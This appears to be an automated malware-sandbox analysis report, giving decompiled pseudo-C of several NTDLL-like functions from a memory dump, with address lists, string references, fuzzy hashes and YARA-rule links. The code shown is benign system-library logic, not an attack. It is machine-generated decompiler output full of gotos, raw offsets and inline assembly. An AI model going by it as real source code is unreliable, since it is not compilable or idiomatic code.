				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x053ef71d
0x053ef722
0x053ef726
0x05434770
0x053ef765
0x053ef769
0x053ef769
0x053ef732
0x0543477a
0x00000000
0x0543477a
0x053ef738
0x053ef73a
0x053ef73c
0x053ef73f
0x053ef746
0x053ef778
0x053ef7a9
0x053ef7a9
0x053ef754
0x053ef75a
0x053ef75d
0x053ef75f
0x053ef761
0x053ef76f
0x053ef771
0x053ef771
0x053ef76f
0x053ef763
0x00000000
0x053ef763
0x053ef77d
0x053ef7a3
0x053ef7a5
0x00000000
0x053ef7a5
0x053ef77f
0x053ef782
0x053ef784
0x053ef786
0x00000000
0x00000000
0x00000000
0x053ef788
0x053ef748
0x053ef74d
0x053ef78d
0x053ef793
0x053ef7b7
0x053ef7bc
0x00000000
0x053ef7bc
0x053ef798
0x00000000
0x00000000
0x053ef79d
0x053ef7b0
0x00000000
0x053ef7b0
0x053ef79f
0x00000000
0x053ef74f
0x053ef74f
0x00000000
0x053ef74f

Strings

Actx , xrefs: 053EF73F

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 3ac1294d9375adbae89e07331225d969ebaf48a6fa5d90fb1f529aa9ca4110ad
Instruction ID: daa289617065fea3329cff7ab48db9d185356c7a5631e6da87d248e06f31c1be
Opcode Fuzzy Hash: 3ac1294d9375adbae89e07331225d969ebaf48a6fa5d90fb1f529aa9ca4110ad
Instruction Fuzzy Hash: F111B2353086328BEB248E1D849077676DBFB956E4F25452AE866CB7D1EBF1C8408380

Uniqueness

Uniqueness Score: -1.00%

Function 05478DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E05478DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x54a0d50);
				E0541D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E05455720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0541DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0541DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0541D130(_t34, _t39, _t40);
			}

0x05478df1
0x05478df1
0x05478df1
0x05478df1
0x05478df1
0x05478df1
0x05478df3
0x05478df8
0x05478dfd
0x05478e00
0x05478e0e
0x05478e2a
0x05478e36
0x05478e38
0x05478e3c
0x05478e46
0x05478e46
0x05478e36
0x05478e50
0x05478e56
0x05478e59
0x05478e5c
0x05478e60
0x05478e67
0x05478e6d
0x05478e73
0x05478e74
0x05478eb1
0x05478ebd

Strings

Critical error detected %lx, xrefs: 05478E21

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: b878389a563ded351f3eb2cf3a4d449dbe03ccd5b01d2a0cbab9ac4eec865995
Instruction ID: 4fb3b9935f995da009719ad4944d2114f5f3bf820332c9df00a2c1d77a002819
Opcode Fuzzy Hash: b878389a563ded351f3eb2cf3a4d449dbe03ccd5b01d2a0cbab9ac4eec865995
Instruction Fuzzy Hash: 49115BB5E14348EADF28CFA985097DDBBB1BB04315F24425EE569AB382C3744602CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0545FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0545FF60

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: f3d1cd361027a7abb603e758c7ce2a4635a458801b4a8c873607614e91752e1a
Instruction ID: 938d881504d744ef083072dd5a4040f2f47e51ae361c1d9413b2a40b19865e0b
Opcode Fuzzy Hash: f3d1cd361027a7abb603e758c7ce2a4635a458801b4a8c873607614e91752e1a
Instruction Fuzzy Hash: DA1104B2A20184FFDB12DB50C949FD9BBB1FF04724F14809AF90957662C7389A44DB51

Uniqueness

Uniqueness Score: -1.00%

Function 05495BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E05495BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x54a1178);
				E0541D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05494C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0540D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05495542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x54b60e8;
								if( *0x54b60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x54b60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E05409710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E05406DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0540F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0540F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0540F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0540FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0540FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0540F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0540F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05494CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0541D130(_t427, _t494, _t511);
				}
			}

0x05495ba5
0x05495baa
0x05495baf
0x05495bb4
0x05495bb6
0x05495bbc
0x05495bbe
0x05495bc4
0x05495bcd
0x05495bd3
0x05495bd6
0x05495bdc
0x05495be0
0x05495be3
0x05495beb
0x05495bf2
0x05495bf8
0x05495bfe
0x05495c04
0x05495c0e
0x05495c18
0x05495c1f
0x05495c25
0x05495c2a
0x05495c2c
0x05495c32
0x05495c3a
0x05495c3f
0x05495c42
0x05495c48
0x05495c5b
0x05495c5b
0x05495c2c
0x05495cb7
0x05495cb9
0x05495cbf
0x05495cc2
0x05495cca
0x05495ccb
0x05495ccb
0x05495cd1
0x05495cd7
0x05495cda
0x05495ce1
0x05495ce4
0x05495ce7
0x05495ced
0x05495cf3
0x05495cf9
0x05495cff
0x05495d08
0x05495d0a
0x05495d0e
0x05495d10
0x00000000
0x00000000
0x05495d16
0x05495d1a
0x00000000
0x00000000
0x05495d20
0x05495d22
0x05495d25
0x05495d2f
0x05495d2f
0x05495d33
0x05495d3d
0x05495d49
0x05495d4b
0x00000000
0x00000000
0x05495d5a
0x05495d5d
0x05495d60
0x00000000
0x00000000
0x05495d66
0x05495d69
0x00000000
0x00000000
0x05495d6f
0x05495d6f
0x05495d73
0x05495d79
0x05495d7f
0x05495d86
0x05495d95
0x05495d98
0x05495dba
0x05495dcb
0x05495dce
0x05495dd3
0x05495dd6
0x05495dd8
0x05495de6
0x05495dec
0x05495dee
0x05495df1
0x05495df3
0x0549635a
0x0549635a
0x00000000
0x0549635a
0x05495dfe
0x05495e02
0x05495e05
0x05495e07
0x05495e10
0x05495e13
0x05495e1b
0x05495e1c
0x05495e21
0x05495e22
0x05495e23
0x05495e25
0x05495e2a
0x05495e2c
0x05495e2e
0x05495e36
0x05495e39
0x05495e42
0x05495e47
0x05495e4d
0x05495e54
0x05495e54
0x05495e54
0x05495e2e
0x05495e5c
0x05495e5f
0x05495e62
0x05495e64
0x05495e6b
0x05495e70
0x05495e7a
0x05495e7a
0x05495e7a
0x05495e6b
0x05495e7e
0x05495e7f
0x05495e7f
0x05495e81
0x05495e87
0x05495e8b
0x05495e8c
0x05495e8c
0x05495e8c
0x05495e9a
0x05495e9c
0x05495ea2
0x05495ea6
0x05495f50
0x05495f50
0x05495f57
0x05495f66
0x05495f66
0x05495f66
0x05495f68
0x05495f6a
0x054963d0
0x00000000
0x05495f70
0x05495f70
0x05495f91
0x05495f9c
0x05495f9e
0x05495fa4
0x05495fa6
0x0549638c
0x05496392
0x054963a1
0x054963a7
0x054963af
0x054963af
0x054963bd
0x054963d8
0x00000000
0x054963d8
0x05495fac
0x05495fb2
0x05495fb4
0x05495fbd
0x05495fc6
0x05495fce
0x05495fd4
0x05495fdc
0x05495fec
0x05495fed
0x05495fee
0x05495fef
0x05495ff9
0x05495ffa
0x05495ffb
0x05495ffc
0x05496000
0x05496004
0x05496012
0x05496012
0x05496018
0x05496019
0x0549601a
0x0549601b
0x0549601c
0x05496020
0x05496059
0x0549605c
0x05496061
0x05496061
0x05496022
0x05496022
0x05496022
0x05496025
0x0549602a
0x0549602b
0x05496031
0x05496037
0x05496038
0x0549603e
0x05496048
0x05496049
0x0549604a
0x0549604b
0x0549604c
0x0549604d
0x05496053
0x05496054
0x05496054
0x05496062
0x05496065
